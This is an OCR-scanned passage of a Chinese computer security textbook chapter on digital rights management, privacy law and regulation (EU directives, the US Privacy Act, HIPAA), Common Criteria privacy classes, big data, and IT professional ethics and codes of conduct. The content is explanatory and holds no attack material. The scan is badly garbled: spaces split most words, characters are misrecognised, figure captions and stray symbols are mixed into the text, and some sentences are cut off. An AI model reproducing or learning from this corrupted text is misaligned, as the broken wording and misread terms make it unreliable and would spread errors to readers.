e 内 容 提供 者 ( content provider): 拥有 内 容 的 数字 版 权 并 且 想 要 保护 这 些 权 利 。 这 样 的 

例子 是 音乐 唱片 公司 和 电影 工作 室 。 

e 经 销 商 (distributor): 提供 发 行 渠 ， 

道 ， 如 可 以 是 一 家 网 上 商店 或 者 网 ~ 
络 零售 商 。 例 如 ， 网 上 经 销 商 接 受 
内 容 供应 商 的 数字 内 容 并 且 创 建 了 
一 个 目录 网 页 用 于 展示 内 容 和 版 权 






元 数据 以 帮助 销售 。 : 7 
o 消费 者 (consumer): 使 用 系统 通过 支付 发 行 费 
检索 可 下 载 的 内 容 或 者 使 用 分 配 汇 Fi 


| 

| 

| 

| 

| 

| 

| 

| / 
| 支付 专利 费 。 
| 

| 

| 

| 

| 

| 

| 


道 串 流 内 容 的 方法 访问 数字 内 容 ， 


然后 为 数字 许可 证 付费 。 消 费 者 使 们 数字 许可 证 





用 的 播放 器 /查看 器 应 用 程序 负责 要 求 许可 证 和 付费 
向 票据 交换 所 提交 许可 申请 和 加 强 ib 
内 容 使 用 权 。 -一 资金 流 
e 票据 交换 所 ( clearinghouse) : 处 理 图 19-2 DRM 各 个 组 成 部 分 


为 消费 者 颁发 数字 许可 证 过 程 的 财 
务 事务 ， 向 内 容 供应 者 支付 版 税 和 向 经 销 商 支付 发 行 费 。 票 据 交 换 所 也 负责 为 每 位 消 
费 者 记录 许可 证 的 使 用 情况 。 
在 这 个 模型 中 ， 经 销 商 不 需要 强制 执行 访问 权 。 相 反 ， 内 容 供应 商 通 过 使 消费 者 必须 从 票 
据 交 换 所 购买 数字 许可 证 和 接 人 能 力 的 方式 来 保护 内 容 。 票 据 交 换 所 通过 商议 由 内 容 供应 商 提 
供 的 使 用 规则 来 决定 哪些 访问 是 被 允许 的 ， 以 及 特定 访问 类 型 的 费用 。 在 收集 到 费用 后 ， 票 据 
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交换 所 应 当 适 时 地 向 内 容 提供 者 和 经 销 商 提供 交易 凭证。 

图 19-3 展示 了 一 个 支持 DRM 功能 的 通用 体系 结构 。 参 与 者 可 以 以 三 种 角色 对 系统 进行 
访问 。 版 权 所 有 者 (right holder) 应 是 内 容 提 供 者 ， 负 责 内 容 创 建 和 取得 内 容 的 版 权 。 服 务 提 
供 者 ( service provider) 包括 经 销 商 和 票据 交换 所 。 消 费 者 是 那些 为 特定 用 途 而 购买 内 容 访问 
权 的 人 。DRM 系统 提供 了 针对 服务 的 系统 接口 : 

e 身份 管理 (identity management): 对 实体 进行 唯一 识别 的 机 制 ， 例 如 参与 者 和 内 容 。 

e 内 容 管 理 (content management): 管理 内 容 生 存 方式 所 需要 的 过 程 和 功能 。 

e 权利 管理 (right management): 管理 版 权 、 版 权 所 有 者 和 相关 的 需求 所 需要 的 过 程 和 

功能 。 





图 19-3 DRM 系统 结构 


在 这 些 管理 模块 之 下 是 一 组 常用 功能 。 安 全 /加 密 (security/encryption ) 模块 提供 对 内 容 
进行 加 密 和 签署 许可 协议 的 功能 。 身 份 管理 服务 利用 认证 /授权 ( authentication/authorization ) 
功能 来 识别 关系 中 的 所 有 当事人 。 使 用 这 些 功 能 的 身份 管理 服务 包括 以 下 项 目 : 

e 唯一 的 当事人 标识 符 分 配 

e 用 户 概 况 和 偏好 

e 用 户 设备 管理 

© 公 钥 管理 

开具 账单 /支付 (billing/payment) 功能 处 理 消费 者 使 用 费 的 征收 和 在 版 权 所 有 者 和 经 销 商 
之 间 付 款 的 分 配 。 交 付 (delivery) 功能 负责 将 内 容 交 付 给 消费 者 。 


19.3 ”隐私 


一 个 与 计算 机 安全 有 着 许多 重 春 的 问题 是 隐私 问题 。 一 方面 ， 由 于 执法 系统 、 国 家 安全 和 
经 济 刺 激 的 推动 ， 收 集 与 存储 在 信息 系统 中 的 个 人 信息 的 规模 和 相互 关联 性 有 了 迅速 的 增长 。 
其 中 经 济 刺 激 可 能 是 主要 驱动 力 。 在 全 球 信息 经 济 中 ,个体 信息 的 收集 很 可 能 是 最 具 经 济 价值 
的 电子 资产 [JUDY14 ]。 另 一 方面 ， 个 人 已 经 逐渐 地 意识 到 有 关 其 生活 和 活动 的 个 人 信息 和 隐 
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私 如 今 可 以 在 什么 样 的 程度 上 被 政府 机 构 、 企 业 甚至 Internet 用 户 访问 和 获取 。 
人 们 对 个 人 隐私 已 经 或 者 可 能 被 威胁 的 关注 程度 ， 使 得 一 系列 的 法 律 和 技术 方法 被 引入 用 
以 加 强 隐 私 保护 。 


19.3.1 隐私 权 法 律 和 规章 


相当 数量 的 国际 机 构 和 国家 政府 部 门 已 经 引入 法 律 和 规章 来 保护 个 人 隐私 。 本 小 节 ， 我 们 
I al a a 
欧盟 数据 保护 指令 1998 年 ， 欧 盟 采 用 数据 保护 指令 ， 用 于 以 下 目的 : (1) 在 处 理 个 人 
信息 时 ， 确 保 成 员 国 能 够 保护 基本 的 隐私 权 ; (2 ) 防止 成 员 国 限制 个 人 信息 在 欧盟 内 自由 流 
动 。 该 指令 本 身 并 不 是 法 律 ， 但 要 求 成 员 国 在 制定 法 律 时 包含 其 条 款 。 该 指令 是 围绕 着 以 下 个 
人 信息 使 用 原则 而 组 织 
© 通知 (notice): 机 构 必 须 通知 个 人 ， 正 在 收集 哪些 个 人 信息 、 这 些 信息 的 用 途 ， 以 及 个 
人 拥有 哪些 选择 。 
e 同意 (consent); 个 人 必须 有 权力 选择 是 否 以 及 如 何 由 第 三 方 使 用 个 人 信息 ， 或 者 将 个 
人 信息 透露 给 第 三 方 。 在 没有 表示 人 允许 的 情况 下 ， 个 人 有 权 拒 绝对 敏感 信息 的 收集 或 
使 用 ， 包 括 种 族 、 健 康 、 联 盟 成 员 资 格 、 信 和 仰 等 。 
e 一 致 性 (consistency) : 只 有 在 与 发 给 指定 数据 主体 的 通知 中 的 条 款 一 致 ， 并 且 与 数据 
主体 关于 数据 使 用 所 做 出 的 选择 一 致 的 情况 下 ， 机 构 才 可 以 使 用 个 人 信息 。 
访问 〈access) : 个 人 必须 拥有 权利 和 能 力 访问 其 信息 并 且 能 够 改正 、 修 改 或 者 删除 信 
胃 的 任何 部 分 。 
e 安全 (secutity): 机 构 必 须 提供 足够 的 安全 措施 ， 包 括 使 用 技术 手段 和 其 他 方法 来 保护 
个 人 信息 的 完整 性 和 机 密 性 。 
e kii (onward transfer): 接收 个 人 信息 的 第 三 方 必须 提供 与 机 构 同 等 级 的 隐私 保护 。 
© 执行 (enforcement) : 当 机 构 不 遵守 法 律 时 ， 该 指令 授予 数据 主体 隐私 诉讼 权 。 另 外 ， 
欧盟 各 成 员 国 都 拥有 一 个 与 隐私 权 执 法 有 关 的 执法 机 构 。 
最 近 ， 欧 盟 通过 了 与 数据 隐私 相关 的 一 系列 新 指令 。 其 中 之 一 是 2002 年 的 隐私 和 电子 通 
信 指 令 ， 该 指令 规定 成 员 国 有 义务 保护 通信 和 相关 交通 数据 的 机 密 性 。 另 一 个 是 2006 年 的 数 
据 保留 指令 ， 该 指令 规定 成 员 国 有 义务 确保 通信 服务 提供 商 在 6 一 24 个 月 内 保留 指定 类 别 的 通 
信 数 据 ， 并 根据 国家 法 律 向 国家 主管 部 门 提供 这 些 数据 。 但 是 ， 后 一 项 指令 被 欧盟 法 院 宣 布 无 
效 ， 因 为 它 是 对 欧盟 宪章 [RYAN16] 所 载 隐 私 权 的 无 理 干涉 。 这 说 明了 立法 者 面临 的 平衡 数据 
监控 与 适当 隐私 水 平 的 艰巨 任务 。 
美国 隐私 权 倡议 ”美国 采用 的 第 一 个 全 面 的 隐私 权 立 法 是 1974 年 的 隐私 权 法 案 ， 
处 理由 联邦 政府 机 构 收 集 和 使 用 的 个 人 信息 。 该 法 令 旨 在 : 
1. 允许 个 人 决定 哪些 与 其 相关 的 记录 被 收集 、 维 护 、 使 用 或 者 散布 。 
2. 允许 个 人 禁止 在 未 经 允许 的 情况 下 将 为 某 一 目的 获取 的 记录 应 用 于 其 他 目的 。 
3. 允许 个 人 访问 与 其 有 关 的 记录 ， 并 且 对 这 些 记 录 做 适当 的 改正 和 修订 。 
4. 确保 机 构 收集 、 维 护 和 使 用 个 人 信息 时 使 用 适当 的 方法 ， 确 保 信 息 是 最 新 的 、 充 足 的 、 
相关 的 、 非 滥用 的 。 
5. 为 那些 个 人 信息 没有 依据 该 法 案 使 用 的 人 创建 隐私 诉讼 权 。 
如 同 所 有 的 隐私 权 法 律 和 规章 一 样 ， 在 该 法 案 的 最 后 也 规定 了 一 些 例 外 和 附加 条 件 ， 例 
said 涉及 国家 安全 的 问题 以 及 相抵 触 的 个 人 隐私 权 之 间 的 冲突 。 
管 1974 年 的 隐私 权 法 案 包 含 政 府 记 录 ， 美 国 还 是 制定 了 一 些 其 他 法 律 来 涵盖 其 他 领域 , 包括 : 
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e 银行 和 财务 记录 (banking and financial record): 个 人 银行 信息 由 若干 法 律 以 多 种 方式 进 
行 保护 ， 包 括 最 近 和 颁布 的 《金融 服务 现代 化 法 案 》。 

© 信用 报告 (credit report):《 公 平 信用 报告 法 案 》 赋 了 予 个 人 一 定 的 权利 ， 给 予 信用 报告 机 
构 一 定 的 义务 。 

e 医疗 与 健康 保险 记录 (medical and health insurance record): 处 理 私 人 病历 隐私 的 各 种 法 
律 已 经 实施 了 数 十 年 《健康 保险 携带 和 责任 法 案 》( HIPPA) 为 病人 赋予 了 新 的 保护 和 
访问 他 们 自己 的 健康 信息 的 权利 。 

e 儿童 隐私 (children’s privacy): 儿童 在 线 隐 私 保 护法 案 》 限 制 网 上 机 构 收 集 13 岁 以 下 
儿童 的 数据 信息 。 

e 电子 通信 (electronic communication) :《 电 子 通信 隐私 权 法 案 》 通 常 禁止 在 传输 阶段 未 
经 授权 蓄意 窃听 电子 通信 线路 ， 也 禁止 对 用 于 电子 存储 的 线路 和 电子 通信 设备 的 非 授 
权 访 问 。 


19.3.2 机构 的 回应 


机 构 需 要 部 署 管理 控制 和 技术 措施 来 遵守 有 关 隐 私 权 的 法 律 法 规 ， 同 时 还 要 实施 有 关 员 工 [591 
隐私 的 公司 策略 。 此 响应 的 关键 方面 包括 创建 隐私 策略 文档 作为 安全 策略 文档 的 配套 文件 ， 创 
建 战略 隐私 计划 文档 作为 战略 安全 计划 文档 的 配套 文件 ， 以 及 为 员工 创建 隐私 意识 计划 作为 安 
全 意识 计划 的 配套 计划 。 作 为 安全 策略 的 一 部 分 ， 组 织 应 具有 首席 隐私 官 或 相关 人 员 ， 以 及 
用 于 隐私 控制 的 选择 、 实 施 和 监控 的 管理 计划 。NIST SP 800-53 (联邦 信息 系统 和 组 织 的 安全 
与 隐私 控制 ，2015 年 1 H) 中 提供 了 一 组 有 用 且 全 面 的 控制 。 该 组 合 分 为 8 个 系列 ， 共 24 个 
控件 。 
有 两 个 相关 的 ISO 文件 : ISO 27001 (信息 安全 管理 体系 需求 ，2013 年 ) 简要 说 明 必 
须 确保 对 隐私 和 个 人 身份 信息 的 保护 ， 以 遵守 法 规 并 履行 合同 义务 ; ISO 27002 (信息 安全 管 
理 实施 细则 ，2013 年 ) 提供 强调 管理 参与 需要 的 一 般 实 施 指南 。 


19.3.3 ”计算 机 使 用 的 隐私 问题 


通用 标准 规范 [CCPS12b | 包括 了 隐私 类 别 中 一 系列 功能 性 要 求 的 定义 ， 其 应 该 在 一 个 可 
信 系 统 上 实施 。 保 密 功能 的 目的 是 为 用 户 提供 一 种 保护 ， 防 止 其 他 用 户 发 现 和 误 用 其 身份 。 
这 个 规范 ， 对 如 何 将 隐私 支持 功能 设计 成 计算 机 系统 的 一 部 分 ， 具 有 指导 作用 。 图 19-4 中 ， 
将 隐私 划分 为 四 个 主要 方面 ， 其 中 每 个 方面 有 一 个 或 者 多 个 特定 的 功能 : 
e 匿名 (anonymity): 保证 用 户 在 不 泄露 身份 的 情况 下 就 可 以 使 用 资源 和 服务 。 具 体 来 说 ， 
这 意味 着 其 他 用 户 或 主体 不 能 确定 与 主体 (例如 ， 进 程 或 用 户 组 ) 或 操作 绑 定 的 用 户 身 
份 。 进 而 意味 着 系统 不 要 求 用 户 的 实名 。 匿 名 与 绑 定 基于 计算 机 的 用 户 ID 的 授权 和 访 
问 控 制 的 功能 并 不 冲突 。 
e 化 名 (pseudonymity): 保证 用 户 不 泄露 身份 就 可 以 使 用 资源 和 服务 ， 但 是 仍 可 以 对 使 
用 做 出 说 明 。 系 统 将 提供 一 个 别名 以 阻止 其 他 用 户 识别 其 真实 身份 ， 但 是 系统 能 够 从 
其 分 配 的 别名 中 识别 用 户 的 身份 。 
不 可 链接 性 (unlinkability ) : 保证 用 户 可 以 使 用 多 个 资源 或 者 服务 ， 而 其 他 人 不 能 将 这 
些 使 用 情况 联系 在 一 起 。 
不 可 观察 性 ( unobservability) : 保证 用 户 可 以 使 用 资源 或 者 服务 ， 而 没有 他 人 ， 特 别 
是 没有 第 三 方 用 户 ， 能 够 观察 到 正在 使 用 的 资源 或 者 服务 。 不 可 观察 性 要 求 用 户 或 者 
主体 不 能 够 确定 一 项 操作 是 否 正 在 被 执行 。 信 息 分 配 影 响 不 可 观察 性 要 求 安 全 功能 提 [592] 
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供 具体 机 制 以 避免 系统 内 隐私 相关 的 信息 过 分 集中 。 不 要 求 资料 的 不 可 观察 性 要 求 安全 
功能 不 用 设法 得 到 与 隐私 有 关 、 可 能 用 于 威胁 不 可 观察 性 的 信息 。 授 权 用 户 的 可 观察 性 
要 求 安全 功能 提供 一 个 或 者 多 个 授权 用 户 ， 这 些 用 户 具 有 观察 资源 和 服务 使 用 情况 的 
能 力 。 





图 19-4 通用 隐私 类 别 标准 分 解 


注意 : 通用 标准 规范 主要 涉及 关于 个 人 对 计算 机 资源 使 用 的 隐私 ， 而 不 是 关于 其 个 人 信息 
的 隐私 。 


19.3.4 隐私 、 数 据 监管 、 大 数据 与 社交 媒体 


大 企业 、 政 府 和 执法 部 门 的 需求 对 个 人 隐私 构成 了 新 的 威胁 [POLO13]。 包 括 医学 研究 在 
内 的 科学 研究 ， 可 以 通过 分 析 大 量 数据 来 扩展 我 们 的 知识 ， 并 开发 新 的 工具 以 提升 人 们 的 健康 
和 幸福 水 平 。 执 法 和 情报 机 构 在 使 用 数据 监控 技术 完成 任务 方面 变 得 越 来 越 积 极 ， 正 如 2013 
年 在 [LYON15] 上 斯 诺 登 所 生动 地 展示 的 那样 。 私 营 组 织 正在 利用 这 些 发 展 趋势 来 提高 他 们 建 
立 个 人 详细 资料 的 能 力 ， 包 插 网 站 和 社交 媒体 的 广泛 使 用 、 电 子 支付 的 普及 、 蜂 宽 电 话 通信 的 
近乎 普遍 使 用 、 普 适 计 算 以 及 传感器 网 等 。 虽 然 这 些 数据 通常 只 是 为 了 某 种 特定 目的 而 收集 
的 ， 如 管理 客户 端 交 互 ， 但 私营 组 织 们 越 来 越 希 望 能 够 将 这 些 信 息 分 析 、 整 合 ， 以 用 于 其 他 目 
的 。 这 些 目的 包括 更 有 针对 性 的 客户 营销 ， 进 行 研发 创新 ， 以 及 帮助 高 层 制定 决策 。 这 些 数据 
的 收集 和 分 析 的 结果 会 导致 企业 和 机 构 与 个 人 间 的 紧张 关系 。 一 方面 ， 引 入 大 数据 分 析 可 能 会 
帮助 科学 人 研究、 公共 卫生 、 国 家 安全 、 执 法 和 资源 有 效 利用 等 领域 取得 有 益 成 果 ; 但 另 一方 
面 ， 使 用 这 些 数据 会 涉及 尊重 个 人 的 隐私 权 、 公 平 性 权利 、 平 等 权 和 言论 自由 权 等 方面 的 问题 
[HORO15]。 

男 一 个 特别 令 人 关注 的 领域 是 公共 社交 媒体 网 站 ， 如 Facebook。 这 些 网 站 收集 、 分 析 和 
分 享 关于 个 人 及 其 与 其 他 个 人 和 组 织 的 互动 的 大 量 数 据 。 许 多 人 心甘情愿 地 上 传 大 量 的 个 人 信 
息 ， 以 便 迅 速 地 向 朋友 分 享 自己 的 生活 ， 而 这 些 信息 以 前 可 能 被 视 为 私密 或 敏感 信息 。 这 些 信 
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息 可 以 由 这 些 公 司 汇总 和 分 析 。 虽 然 已 经 对 这 些 公司 及 其 管理 和 使 用 这 些 数 据 的 方式 进行 了 通 
当 监 管 ， 但 是 正如 [SMIT12] 所 指出 的 那样 ， 针 对 其 他 人 上 传 的 数据 对 某 个 体 的 影响 的 相关 工 
作 却 做 得 很 少 。 这 包括 由 其 他 人 上 传 的 涉及 某 人 的 照片 或 状态 更 新 ， 其 中 还 可 能 包括 相关 元 数 
据 ， 如 时 间 和 地 点 。 这 些 数据 可 能 会 被 当事人 当前 或 未 来 的 雇主 、 保 险 公 司 、 私 人 调查 员 或 其 
他 人 员 利 用 ， 对 当事人 造成 某 种 损失 。 
当政 府 和 非 政 府 组 织 想 要 尽 可 能 多 地 掌握 个 人 信息 时 ， 隐 私 保护 需要 从 政策 和 技术 两 个 方 
面 来 共同 保障 。 就 技术 方法 而 言 ， 存 储 在 信息 系统 上 的 数据 的 隐私 保护 要 求 可 以 部 分 使 用 为 数 
据 库 安全 性 开发 的 技术 机 制 来 解决 ， 正 如 我 们 在 第 5 章 中 讨论 的 那样 。 
关于 社交 媒体 网 站 ， 技 术 控 制 会 提供 合适 的 隐私 设置 以 管理 可 以 查看 个 人 数据 的 人 ， 以 及 
当 一 个 人 被 引用 或 标记 进 男 一 个 人 的 内 容 时 的 通知 。 也 就 是 说 ， 要 通过 对 这 些 数 据 提 供 适 当 的 
访问 控制 来 进行 隐私 保护 ， 但 其 规模 要 比 大 多 数 IT 系统 所 使 用 的 大 得 多 。 虽 然 社交 媒体 网 站 
包含 某 些 控制 管理 机 制 ， 但 它们 仍 在 不 断 变化 之 中 。 这 让 用 户 感 到 诅 丧 《他 们 很 难 跟 上 这 些 机 
制 的 最 新 进展 )， 同 时 也 表明 最 适当 的 控制 还 没有 找到 。 
管理 大 数据 分 析 中 隐私 问题 的 男 一 种 技术 方法 是 在 数据 发 布 给 研究 人 员 或 其 他 组 织 进 行 分 
析 之 前 ， 对 其 进行 匿名 化 ， 删 除 任 何 个 人 识别 信息 。 不 幸 的 是 ， 最 近 的 一 些 例子 表明 ， 这 些 例 
子 有 时 可 以 被 重新 识别 出 来 ， 因 此 使 用 这 种 方法 需要 非常 小 心 。 当 然 ， 如 果 做 得 恰到好处 ， 它 
确实 可 以 让 公司 机 构 在 避免 个 人 隐私 问题 困扰 的 前 提 下 从 大 数据 分 析 中 获 益 。[HORO15] 提出 
最 近 的 美国 联邦 贸易 委员 会 使 用 的 框架 ， 该 框架 结合 了 技术 和 政策 机 制 ， 通 过 防止 重新 识别 匿 
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在 政策 方面 ， 需 要 指导 方针 来 管理 大 数据 的 使 用 和 重用 ， 确 保 施 加 适当 的 约束 以 保护 隐 
私 。[CLAR15] 详 述 了 在 人 类 研究 中 使 用 电子 数据 的 一 系列 准则 ， 这 些 准则 可 以 应 用 于 其 他 领 
域 。 这 些 准 则 涉及 以 下 领域 : 
e 同意 : 确保 参与 者 在 知情 的 情况 下 对 是 否 参与 研究 做 出 决定 。 
e 隐私 和 机 密 性 (privacy and confidentiality): 隐私 是 指 个 人 对 谁 可 以 访问 其 信息 的 控制 。 
机 密 性 是 指 只 有 经 过 授权 的 人 才能 获得 信息 的 原则 。 

e 所 有 权 及 来 源 (ownership and authorship): 说 明 谁 对 这 些 数据 负 有 责任 ， 以 及 个 人 在 什 
么 时 候 放 弃 了 控制 自己 数据 的 权利 。 

e 数据 共享 一 一 评估 研究 的 社会 效益 : 数据 源 和 男 一 个 研究 项 目 之 间 的 数据 匹配 和 重用 
所 市 来 的 社会 效益 。 

e 治理 和 监管 ( governance and custodianship): 监督 和 实施 对 电子 数据 的 管理 ， 组 织 ， 以 
及 访问 和 保存 。 

在 另 一 种 政策 方法 中 ，[POLO13] 认为 大 数据 系统 决策 者 进行 的 适当 成 本 效益 分 析 应 该 能 
够 平衡 隐私 成 本 与 利用 大 数据 带 来 的 收益 。 它 建议 关注 这 些 问 题 ; 谁 是 大 数据 分 析 的 受益 者 ， 
感知 收益 的 本 质 是 什么 ， 以 及 这 些 收益 能 够 在 多 大 程度 上 实现 。 通 过 这 些 分 析 方 法 ， 其 能 够 考 
虑 大 数据 对 企业 、 个 人 甚至 整个 社会 产生 的 利益 。 

我 们 可 以 看 到 各 国法 律 为 了 更 好 地 解决 这 些 问 题 而 不 断 改 变 。 在 大 规模 或 针对 目标 的 监控 
问题 上 ，[LYON15] 讨论 了 包括 美国 和 英国 在 内 的 铬 干 国家 的 法 律 变化 ， 旨 在 限制 元 数据 的 大 
量 收集 。 这 些 法 律 试图 更 好 地 规范 国家 安全 局 及 其 姐妹 机 构 的 大 规模 监控 ， 并 解决 了 许多 人 将 
元 数据 视 为 个 人 数据 的 担忧 ， 尽 管 这 些 机 构 提 出 了 相反 的 论点 。 该 文章 进一步 探讨 监测 研究 领 
域 的 研究 挑战 ， 这 些 挑战 可 以 帮助 我 们 进一步 了 解 和 回应 这 些 问 题 。[RYAN16] 讨论 了 英国 、 
欧盟 和 加 拿 大 法 院 最 近 的 决议 如 何 解决 对 (从 手机 、Internet 以 及 个 人 隐私 中 收集 到 的 ) 元 数据 
进行 大 数据 分 析 所 带 来 的 安全 与 利益 之 间 的 紧张 和 关系。 这些 回 应 包括 宣布 某 些 立法 无 效 ， 以 及 
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在 其 他 情况 下 实施 旨 在 进一步 保护 隐私 权 的 保障 措施 。 其 指出 ， 在 这 些 案件 中 处 理 的 关键 问题 
包括 : 证 明 部 分 侵犯 公民 隐私 权 的 必要 性 、 权 力 机 关 对 于 侵犯 公民 隐私 权 的 可 说 明 性 〈 归 责 ) 
以 及 公众 对 这 些 侵害 行为 的 了 解 程度 。 


19.4 ”道德 问题 


由 于 信息 系统 在 所 有 类 型 的 机 构 中 越 来 越 普遍 和 重要 ， 存 在 许多 对 信息 和 电子 通信 设备 潜 
在 的 误 用 和 滥用 ， 这 就 造成 了 隐私 和 安全 问题 。 除 了 合法 性 问题 外 ， 误 用 和 滥用 也 引起 人 们 对 
道德 问题 的 关注 。 道 德 指 的 是 一 个 道德 准则 体系 ， 关 系 到 特定 行为 是 有 益 还 是 有 害 ， 也 关系 到 
行为 的 动机 是 正确 还 是 错误 ， 以 及 行为 的 结果 。 本 节 ， 我 们 来 分 析 一 下 与 计算 机 和 信息 系统 安 
全 相关 的 道德 问题 。 


19.4.1 道德 和 IT 行业 


从 某 种 程度 上 说 ， 针 对 是 什么 构成 了 那些 使 用 信息 系统 或 者 访问 信息 系统 的 人 的 道德 行 
为 ， 所 进行 的 特征 描述 并 不 是 唯一 的 。 基 本 的 道德 规范 因 社 会 文明 程度 的 提高 而 得 到 了 发 展 。 
但 是 ， 围 绕 计 算 机 和 信息 系统 存在 着 一 些 独特 的 需要 考虑 的 问题 。 首 先 ， 计算机 技术 使 以 前 不 
可 能 的 很 多 活动 成 为 可 能 。 这 包括 较 大 规模 的 记录 保存 ， 特 别 是 关于 个 人 的 记录 , CARAS 
更 细 粒 度 的 个 人 信息 收集 能 力 及 更 加 精确 的 数据 挖掘 和 数据 匹配 能 力 。Internet 融 来 的 通信 规 
模 和 互联 规模 的 扩大 加 大 了 某 些 个 人 进行 
危害 活动 的 能 力 。 其 次 ,计算 机 技术 包含 
了 新 实体 类 型 的 诞生 ， 这 些 新 实体 与 以 前 
形成 的 道德 规范 相 冲 突 ， 例 如 数据 库 、 网 
TUE RE. WIE A cookie， 等 等 。 

更 进一步 ， 事 实 上， 那些 具有 专业 
知识 和 专业 技能 的 人 对 于 全 人 类 有 着 高 于 
常人 的 道德 义务 。 我 们 可 以 用 一 个 基于 
| GOTT99 | 中 讨论 的 道德 等 级 (ULE 19-5 ) 
模型 来 说 明 这 一 点 。 位 于 等 级 顶层 的 是 专 
业 人 员 与 全 人 类 共有 的 道德 价值 观 ， 如 诚 
信 、 公 平和 正义 。 作 为 一 个 经 过 专业 培训 
的 人 员 ， 还 有 额外 与 其 工作 相关 的 道德 义 
务 。 适 用 于 所 有 专业 人 员 的 一 般 的 原则 是 
在 这 个 等 级 出 现 的 。 最 后 ， 每 个 职业 都 有 > 
其 特定 的 道德 价值 和 义务 ， 这 些 道德 价值 图 19-5 ”道德 层次 结构 
和 义务 与 专业 人 员 的 知识 及 其 对 他 人 的 影 
响 力 有 关 。 大 多 数 的 职业 都 在 职业 行为 规范 中 体现 出 了 全 部 的 道德 等 级 。 这 是 我 们 接 下 去 要 讨 
论 的 主题 。 


19.4.2 与 计算 机 和 信息 系统 有 关 的 道德 问题 


我 们 现在 看 看 计算 机 技术 中 出 现 的 道德 问题 。 计 算 机 已 经 成 为 个 人 信息 和 可 动 资产 的 主要 
储存 库 ， 如 银行 记录 、 证 券 记录 和 其 他 金融 信息 。 其 他 类 型 的 数据 库 ， 包 括 统 计 性 的 和 非 统计 
性 的 ， 都 是 具有 相当 大 价值 的 资产 。 这 些 资 产 只 能 通过 技术 和 自动 化 方法 浏览 、 创 建 和 更 改 。 
那些 能 够 懂得 和 利用 技术 的 人 ， 再 加 上 那些 获得 访问 权限 的 人 ， 拥 有 与 那些 资产 有 关 的 权力 。 
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一 篇 关于 计算 机 和 道德 的 经 典 论文 | PARK88 | 指出 ， 道 德 问 题 是 由 计算 机 所 担当 的 角色 
产生 的 结果 所 引起 的 ， 这 些 角 色 包 括 : 
e 信息 储存 库 和 处 理 器 (repository and processor of information): 未 经 授权 使 用 那些 不 使 
用 将 会 闲置 的 计算 机 服务 或 者 计算 机 中 存储 的 信息 ， 引 起 合适 性 或 者 公正 性 问题 。 
e 新 形式 和 类 型 资产 的 制造 者 ( producer of new form and type of asset): 例如 ， 计 算 机 程序 完 
全 是 一 种 新 型 资产 ， 可 能 与 其 他 资产 的 所 有 权 概 念 有 所 不 同 。 
e 行为 工具 (instruments of act): 计算 机 服务 以 及 计算 机 、 数 据 和 程序 的 用 户 ， 必 须 在 多 
大 程度 上 对 计算 机 输出 的 完整 性 和 合适 性 负责 ? 
© 威胁 和 欺骗 的 标志 (symbol of intimidation and deception): 把 计算 机 想象 成 会 思考 的 机 
器 、 绝 对 真理 的 制造 者 、 绝 对 可 靠 的 、 容 易 受 到 指责 的 ， 以 及 犯错 者 的 神奇 替代 者 的 
做 法 ， 值 得 我 们 深思 。 
我 们 主要 关注 职业 责任 与 道德 或 伦理 责任 的 平衡 问题 。 这 里 我 们 引用 计算 机 或 者 IT 专业 
人 员 面 临 的 各 种 类 型 的 道德 问题 中 的 两 个 领域 。 第 一 个 是 ，IT 专业 人 员 可 能 发 现 他 们 自己 处 
于 这 样 的 境地 : 即 职业 道德 上 的 责任 与 其 对 老板 的 忠诚 相 冲 突 。 这 种 冲突 会 给 员工 之 来 激烈 的 
思想 斗争 ， 要 么 辟 起 勇气 去 告发 ， 要 么 置身 于 一 个 可 能 有 损 公 众 或 者 公司 客户 利益 的 处 境 中 。 
例如 ， 软 件 开 发 者 可 能 知道 一 个 产品 在 未 经 过 充分 检测 的 情况 下 就 按 计划 进行 发 布 ， 以 满足 
老板 指定 的 交 货 期 。 是 否 告发 此 事 是 作为 一 个 IT 专业 人 员 最 困难 的 抉择 之 一 。 机 构 有 义务 为 
员工 提供 可 供 选 择 的 、 不 太极 端的 机 会 ， 如 一 个 内 部 的 监督 专员 再 加 上 一 个 不 处 罚 暴 露 内 部 问题 
的 员工 的 承诺 。 男 外 ， 专 业 学 会 应 该 提供 一 种 机 制 ， 这 种 机 制 让 其 成 员 可 以 得 到 关于 如 何 举 报 的 
建议 。 
男 一 个 道德 问题 的 例子 涉及 可 能 的 利益 冲突 。 例 如 ， 如 果 某 顾问 在 某 供应 商 处 拥有 财务 利 
益 ， 那 么 当 这 个 顾问 向 任何 客户 推荐 该 供应 商 的 产品 和 服务 时 ， 此 利益 关系 应 该 被 公开 。 


19.4.3 ”行为 规范 


与 科学 和 工程 学 领域 不 同 的 是 ， 道 德 不 能 被 简化 为 精确 的 法 律 条 款 或 者 具体 的 法 案 。 尽 
管 一 个 行业 的 雇主 或 者 客户 可 以 期 待 该 行业 有 一 个 内 部 道德 准则 ， 但 是 许多 行业 领域 在 这 个 方 
面 可 能 表现 得 较为 模糊 。 为 了 给 专业 人 员 提 供 专 业 指 导 和 阐明 雇主 和 顾客 所 期 待 的 权利 是 怎样 
的 ， 许 多 行业 协会 已 经 采纳 了 一 些 行为 道德 规范 。 

职业 行为 规范 能 够 提供 下 列 功能 | GOTT99 |: 

1. 该 规范 能 够 提供 两 种 启发 功能 : 一 个 是 为 部 分 行业 的 道德 行为 提供 积极 的 刺激 作用 ， 另 
一 个 是 增加 消费 者 或 者 用 户 对 于 IT 产品 或 者 服务 的 信心 。 然 而 ， 停 留 在 仅仅 提供 启发 性 语言 
的 规范 在 说 明 的 丰富 程度 上 可 能 是 模糊 和 开放 的 。 

2. 规范 可 以 是 教育 性 的 。 它 告知 专业 人 员 ， 为 了 保证 特定 水 平 的 工作 质量 ， 他 们 需要 做 出 
哪些 承诺 ; 为 了 其 产品 用 户 和 公众 的 利益 ， 他 们 需要 承担 哪些 责任 ， 以 及 产品 可 能 会 影响 非 使 
用 者 的 范围 。 该 规范 也 可 以 用 于 教育 管理 者 ， 主 要 是 关于 管理 者 鼓励 和 支持 员工 讲 道德 的 义务 
及 管理 者 目 身 的 道德 义务 。 

3. 规范 能 够 在 专业 人 员 做 出 的 遵守 道德 的 决策 可 能 与 管理 者 或 者 顾客 形成 冲突 的 情况 下 为 
其 提供 支持 。 

4. 规范 可 以 是 一 种 威慑 和 训练 的 手段 。 行 业 协 会 能 够 将 规范 作为 取消 成 员 资格 甚至 撤销 行 
业 许 可 证 的 依据 。 员 工 能 够 用 规范 作为 行为 处 罚 的 依据 。 

5. 如 果 规 范 受 到 广泛 重视 ， 那 么 它 就 能 够 提升 行业 的 公众 形象 。 

